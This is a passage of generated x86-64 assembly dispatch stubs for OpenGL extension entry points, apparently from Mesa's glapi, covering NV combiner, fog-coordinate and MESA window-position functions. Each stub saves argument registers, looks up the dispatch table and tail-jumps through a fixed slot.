	.size	GL_PREFIX(MultiDrawArraysEXT), .-GL_PREFIX(MultiDrawArraysEXT)

	/* glMultiDrawElementsEXT: slot 4800; 5 GPR args (odd count — no pad) */
	.p2align	4,,15
	.globl GL_PREFIX(MultiDrawElementsEXT)
	.type GL_PREFIX(MultiDrawElementsEXT), @function
GL_PREFIX(MultiDrawElementsEXT):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4800(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	call	_x86_64_get_dispatch@PLT
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	4800(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4800(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	call	_glapi_get_dispatch
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	4800(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(MultiDrawElementsEXT), .-GL_PREFIX(MultiDrawElementsEXT)

	/* glFogCoordPointerEXT: slot 4808; 3 GPR args (%rdi,%rsi,%rdx) */
	.p2align	4,,15
	.globl GL_PREFIX(FogCoordPointerEXT)
	.type GL_PREFIX(FogCoordPointerEXT), @function
GL_PREFIX(FogCoordPointerEXT):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4808(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_x86_64_get_dispatch@PLT
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	4808(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4808(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_glapi_get_dispatch
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	4808(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(FogCoordPointerEXT), .-GL_PREFIX(FogCoordPointerEXT)
	/* Dispatch stubs (generated).  FP-argument stubs spill live %xmm
	 * registers to a stack frame instead of pushing GPRs; the subq
	 * amount (8 here) keeps %rsp 16-byte aligned at the lookup call
	 * (SysV AMD64 enters with %rsp % 16 == 8). */
	/* glFogCoorddEXT: slot 4816; 1 FP arg spilled from %xmm0 */
	.p2align	4,,15
	.globl GL_PREFIX(FogCoorddEXT)
	.type GL_PREFIX(FogCoorddEXT), @function
GL_PREFIX(FogCoorddEXT):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4816(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	subq	$8, %rsp
	movq	%xmm0, (%rsp)
	call	_x86_64_get_dispatch@PLT
	movq	(%rsp), %xmm0
	addq	$8, %rsp
	movq	4816(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4816(%rax), %r11
	jmp	*%r11
1:
	subq	$8, %rsp
	movq	%xmm0, (%rsp)
	call	_glapi_get_dispatch
	movq	(%rsp), %xmm0
	addq	$8, %rsp
	movq	4816(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(FogCoorddEXT), .-GL_PREFIX(FogCoorddEXT)

	/* glFogCoorddvEXT: slot 4824; 1 GPR arg (%rdi) */
	.p2align	4,,15
	.globl GL_PREFIX(FogCoorddvEXT)
	.type GL_PREFIX(FogCoorddvEXT), @function
GL_PREFIX(FogCoorddvEXT):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4824(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	call	_x86_64_get_dispatch@PLT
	popq	%rdi
	movq	4824(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4824(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	call	_glapi_get_dispatch
	popq	%rdi
	movq	4824(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(FogCoorddvEXT), .-GL_PREFIX(FogCoorddvEXT)

	/* glFogCoordfEXT: slot 4832; 1 FP arg spilled from %xmm0 */
	.p2align	4,,15
	.globl GL_PREFIX(FogCoordfEXT)
	.type GL_PREFIX(FogCoordfEXT), @function
GL_PREFIX(FogCoordfEXT):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4832(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	subq	$8, %rsp
	movq	%xmm0, (%rsp)
	call	_x86_64_get_dispatch@PLT
	movq	(%rsp), %xmm0
	addq	$8, %rsp
	movq	4832(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4832(%rax), %r11
	jmp	*%r11
1:
	subq	$8, %rsp
	movq	%xmm0, (%rsp)
	call	_glapi_get_dispatch
	movq	(%rsp), %xmm0
	addq	$8, %rsp
	movq	4832(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(FogCoordfEXT), .-GL_PREFIX(FogCoordfEXT)

	/* glFogCoordfvEXT: slot 4840; 1 GPR arg (%rdi) */
	.p2align	4,,15
	.globl GL_PREFIX(FogCoordfvEXT)
	.type GL_PREFIX(FogCoordfvEXT), @function
GL_PREFIX(FogCoordfvEXT):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4840(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	call	_x86_64_get_dispatch@PLT
	popq	%rdi
	movq	4840(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4840(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	call	_glapi_get_dispatch
	popq	%rdi
	movq	4840(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(FogCoordfvEXT), .-GL_PREFIX(FogCoordfvEXT)
	/* Dispatch stubs (generated): fetch dispatch table, tail-jump
	 * through the slot via %r11.  PTHREADS variant saves the live
	 * argument registers around the lookup; a %rbp push is only
	 * stack-alignment padding (odd push count keeps %rsp 16-aligned
	 * at the call under SysV AMD64). */
	/* _dispatch_stub_606: slot 4848; 1 GPR arg; HIDDEN — not exported
	 * under a GL name from this object */
	.p2align	4,,15
	.globl GL_PREFIX(_dispatch_stub_606)
	.type GL_PREFIX(_dispatch_stub_606), @function
	HIDDEN(GL_PREFIX(_dispatch_stub_606))
GL_PREFIX(_dispatch_stub_606):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4848(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	call	_x86_64_get_dispatch@PLT
	popq	%rdi
	movq	4848(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4848(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	call	_glapi_get_dispatch
	popq	%rdi
	movq	4848(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(_dispatch_stub_606), .-GL_PREFIX(_dispatch_stub_606)

	/* glBlendFuncSeparateEXT: slot 4856; 4 GPR args + %rbp pad */
	.p2align	4,,15
	.globl GL_PREFIX(BlendFuncSeparateEXT)
	.type GL_PREFIX(BlendFuncSeparateEXT), @function
GL_PREFIX(BlendFuncSeparateEXT):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4856(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	4856(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4856(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	4856(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(BlendFuncSeparateEXT), .-GL_PREFIX(BlendFuncSeparateEXT)
	/* Dispatch stubs (generated).  %rbp pushes below carry no argument:
	 * they pad the push count to odd so %rsp is 16-byte aligned at the
	 * dispatch-lookup call (SysV AMD64 entry has %rsp % 16 == 8). */
	/* glFlushVertexArrayRangeNV: slot 4864; no args — lone %rbp push
	 * is pure alignment padding */
	.p2align	4,,15
	.globl GL_PREFIX(FlushVertexArrayRangeNV)
	.type GL_PREFIX(FlushVertexArrayRangeNV), @function
GL_PREFIX(FlushVertexArrayRangeNV):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4864(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	movq	4864(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4864(%rax), %r11
	jmp	*%r11
1:
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	movq	4864(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(FlushVertexArrayRangeNV), .-GL_PREFIX(FlushVertexArrayRangeNV)

	/* glVertexArrayRangeNV: slot 4872; 2 GPR args + %rbp pad */
	.p2align	4,,15
	.globl GL_PREFIX(VertexArrayRangeNV)
	.type GL_PREFIX(VertexArrayRangeNV), @function
GL_PREFIX(VertexArrayRangeNV):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4872(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	4872(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4872(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	4872(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(VertexArrayRangeNV), .-GL_PREFIX(VertexArrayRangeNV)
	/* Dispatch stubs (generated).  Six-GPR-argument entry points save
	 * all of %rdi,%rsi,%rdx,%rcx,%r8,%r9 plus a %rbp alignment pad
	 * (7 pushes — odd, so %rsp stays 16-byte aligned at the call). */
	/* glCombinerInputNV: slot 4880; 6 GPR args + %rbp pad */
	.p2align	4,,15
	.globl GL_PREFIX(CombinerInputNV)
	.type GL_PREFIX(CombinerInputNV), @function
GL_PREFIX(CombinerInputNV):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4880(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	pushq	%r9
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%r9
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	4880(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4880(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	pushq	%r9
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%r9
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	4880(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(CombinerInputNV), .-GL_PREFIX(CombinerInputNV)

	/* glCombinerOutputNV: slot 4888; 6 GPR args + %rbp pad */
	.p2align	4,,15
	.globl GL_PREFIX(CombinerOutputNV)
	.type GL_PREFIX(CombinerOutputNV), @function
GL_PREFIX(CombinerOutputNV):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4888(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	pushq	%r9
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%r9
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	4888(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4888(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	pushq	%r9
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%r9
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	4888(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(CombinerOutputNV), .-GL_PREFIX(CombinerOutputNV)
	/* Dispatch stubs (generated).  Mixed GPR/FP entry points spill both
	 * the integer and %xmm argument registers into a stack frame whose
	 * size (24 here) keeps %rsp 16-byte aligned at the lookup call. */
	/* glCombinerParameterfNV: slot 4896; 1 GPR arg (%rdi) + 1 FP arg
	 * (%xmm0), spilled to a 24-byte frame */
	.p2align	4,,15
	.globl GL_PREFIX(CombinerParameterfNV)
	.type GL_PREFIX(CombinerParameterfNV), @function
GL_PREFIX(CombinerParameterfNV):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4896(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	subq	$24, %rsp
	movq	%rdi, (%rsp)
	movq	%xmm0, 8(%rsp)
	call	_x86_64_get_dispatch@PLT
	movq	8(%rsp), %xmm0
	movq	(%rsp), %rdi
	addq	$24, %rsp
	movq	4896(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4896(%rax), %r11
	jmp	*%r11
1:
	subq	$24, %rsp
	movq	%rdi, (%rsp)
	movq	%xmm0, 8(%rsp)
	call	_glapi_get_dispatch
	movq	8(%rsp), %xmm0
	movq	(%rsp), %rdi
	addq	$24, %rsp
	movq	4896(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(CombinerParameterfNV), .-GL_PREFIX(CombinerParameterfNV)

	/* glCombinerParameterfvNV: slot 4904; 2 GPR args + %rbp pad */
	.p2align	4,,15
	.globl GL_PREFIX(CombinerParameterfvNV)
	.type GL_PREFIX(CombinerParameterfvNV), @function
GL_PREFIX(CombinerParameterfvNV):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4904(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	4904(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4904(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	4904(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(CombinerParameterfvNV), .-GL_PREFIX(CombinerParameterfvNV)

	/* glCombinerParameteriNV: slot 4912; 2 GPR args + %rbp pad */
	.p2align	4,,15
	.globl GL_PREFIX(CombinerParameteriNV)
	.type GL_PREFIX(CombinerParameteriNV), @function
GL_PREFIX(CombinerParameteriNV):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4912(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	4912(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4912(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	4912(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(CombinerParameteriNV), .-GL_PREFIX(CombinerParameteriNV)

	/* glCombinerParameterivNV: slot 4920; 2 GPR args + %rbp pad */
	.p2align	4,,15
	.globl GL_PREFIX(CombinerParameterivNV)
	.type GL_PREFIX(CombinerParameterivNV), @function
GL_PREFIX(CombinerParameterivNV):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4920(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	4920(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4920(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	4920(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(CombinerParameterivNV), .-GL_PREFIX(CombinerParameterivNV)
	/* Dispatch stubs (generated): save live argument GPRs around the
	 * dispatch-table lookup, then tail-jump through the slot via %r11.
	 * A %rbp push is alignment padding only (odd push count keeps %rsp
	 * 16-byte aligned at the call). */
	/* glFinalCombinerInputNV: slot 4928; 4 GPR args + %rbp pad */
	.p2align	4,,15
	.globl GL_PREFIX(FinalCombinerInputNV)
	.type GL_PREFIX(FinalCombinerInputNV), @function
GL_PREFIX(FinalCombinerInputNV):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4928(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	4928(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4928(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	4928(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(FinalCombinerInputNV), .-GL_PREFIX(FinalCombinerInputNV)

	/* glGetCombinerInputParameterfvNV: slot 4936; 5 GPR args (odd — no pad) */
	.p2align	4,,15
	.globl GL_PREFIX(GetCombinerInputParameterfvNV)
	.type GL_PREFIX(GetCombinerInputParameterfvNV), @function
GL_PREFIX(GetCombinerInputParameterfvNV):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4936(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	call	_x86_64_get_dispatch@PLT
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	4936(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4936(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	call	_glapi_get_dispatch
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	4936(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(GetCombinerInputParameterfvNV), .-GL_PREFIX(GetCombinerInputParameterfvNV)

	/* glGetCombinerInputParameterivNV: slot 4944; 5 GPR args (odd — no pad) */
	.p2align	4,,15
	.globl GL_PREFIX(GetCombinerInputParameterivNV)
	.type GL_PREFIX(GetCombinerInputParameterivNV), @function
GL_PREFIX(GetCombinerInputParameterivNV):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4944(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	call	_x86_64_get_dispatch@PLT
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	4944(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4944(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	call	_glapi_get_dispatch
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	4944(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(GetCombinerInputParameterivNV), .-GL_PREFIX(GetCombinerInputParameterivNV)
	/* Dispatch stubs (generated): save live argument GPRs around the
	 * dispatch lookup; %rbp pushes are 16-byte stack-alignment padding
	 * only; tail-jump through the slot via caller-clobbered %r11. */
	/* glGetCombinerOutputParameterfvNV: slot 4952; 4 GPR args + %rbp pad */
	.p2align	4,,15
	.globl GL_PREFIX(GetCombinerOutputParameterfvNV)
	.type GL_PREFIX(GetCombinerOutputParameterfvNV), @function
GL_PREFIX(GetCombinerOutputParameterfvNV):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4952(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	4952(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4952(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	4952(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(GetCombinerOutputParameterfvNV), .-GL_PREFIX(GetCombinerOutputParameterfvNV)

	/* glGetCombinerOutputParameterivNV: slot 4960; 4 GPR args + %rbp pad */
	.p2align	4,,15
	.globl GL_PREFIX(GetCombinerOutputParameterivNV)
	.type GL_PREFIX(GetCombinerOutputParameterivNV), @function
GL_PREFIX(GetCombinerOutputParameterivNV):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4960(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	4960(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4960(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	4960(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(GetCombinerOutputParameterivNV), .-GL_PREFIX(GetCombinerOutputParameterivNV)

	/* glGetFinalCombinerInputParameterfvNV: slot 4968; 3 GPR args */
	.p2align	4,,15
	.globl GL_PREFIX(GetFinalCombinerInputParameterfvNV)
	.type GL_PREFIX(GetFinalCombinerInputParameterfvNV), @function
GL_PREFIX(GetFinalCombinerInputParameterfvNV):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4968(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_x86_64_get_dispatch@PLT
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	4968(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4968(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_glapi_get_dispatch
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	4968(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(GetFinalCombinerInputParameterfvNV), .-GL_PREFIX(GetFinalCombinerInputParameterfvNV)

	/* glGetFinalCombinerInputParameterivNV: slot 4976; 3 GPR args */
	.p2align	4,,15
	.globl GL_PREFIX(GetFinalCombinerInputParameterivNV)
	.type GL_PREFIX(GetFinalCombinerInputParameterivNV), @function
GL_PREFIX(GetFinalCombinerInputParameterivNV):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4976(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_x86_64_get_dispatch@PLT
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	4976(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4976(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_glapi_get_dispatch
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	4976(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(GetFinalCombinerInputParameterivNV), .-GL_PREFIX(GetFinalCombinerInputParameterivNV)
	/* Dispatch stubs (generated): load dispatch table into %rax, then
	 * tail-jump through the function's slot via %r11.  Register saves
	 * around the PTHREADS lookup call preserve live arguments and keep
	 * %rsp 16-byte aligned (SysV AMD64). */
	/* glResizeBuffersMESA: slot 4984; no args — lone %rbp push is pure
	 * alignment padding */
	.p2align	4,,15
	.globl GL_PREFIX(ResizeBuffersMESA)
	.type GL_PREFIX(ResizeBuffersMESA), @function
GL_PREFIX(ResizeBuffersMESA):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4984(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	movq	4984(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	4984(%rax), %r11
	jmp	*%r11
1:
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	movq	4984(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(ResizeBuffersMESA), .-GL_PREFIX(ResizeBuffersMESA)

	/* glWindowPos2dMESA: slot 4992; 2 FP args spilled from %xmm0/%xmm1
	 * into a 24-byte frame (24 keeps %rsp 16-aligned at the call) */
	.p2align	4,,15
	.globl GL_PREFIX(WindowPos2dMESA)
	.type GL_PREFIX(WindowPos2dMESA), @function
GL_PREFIX(WindowPos2dMESA):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	4992(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	subq	$24, %rsp
	movq	%xmm0, (%rsp)
	movq	%xmm1, 8(%rsp)
	call	_x86_64_get_dispatch@PLT
	movq	8(%rsp), %xmm1
	movq	(%rsp), %xmm0
	addq	$24, %rsp
	movq	4992(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
